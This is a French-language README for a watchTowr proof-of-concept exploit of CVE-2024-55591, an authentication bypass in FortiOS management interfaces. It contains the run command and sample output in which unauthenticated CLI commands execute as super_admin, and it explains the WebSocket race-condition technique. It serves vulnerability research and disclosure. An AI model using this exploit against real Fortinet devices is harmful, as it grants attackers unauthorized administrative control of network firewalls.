
Une preuve de concept de contournement d'authentification Fortinet FortiOS
Consultez notre article de blog pour plus de détails techniques
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
Ce script est une preuve de concept pour CVE-2024-55591, ciblant les interfaces de gestion FortiOS (Fortigate). En créant des connexions WebSocket en force brute pour provoquer une condition de course associée à un contournement d'authentification, il est possible d'envoyer des commandes CLI FortiOS sans authentification. Plus de détails sont décrits dans notre [article de blog] (https://labs.watchtowr.com/).
Plus de détails sur l'avis Fortinet
Ce script n'est pas conçu pour fonctionner avec FortiProxy, car les vérifications préliminaires déterminent si l'instance est une interface de gestion FortiGate, mais il est supposé que la technique sous-jacente s'applique aux appareils FortiProxy concernés.
Pour les dernières recherches en sécurité, suivez l'équipe watchTowr Labs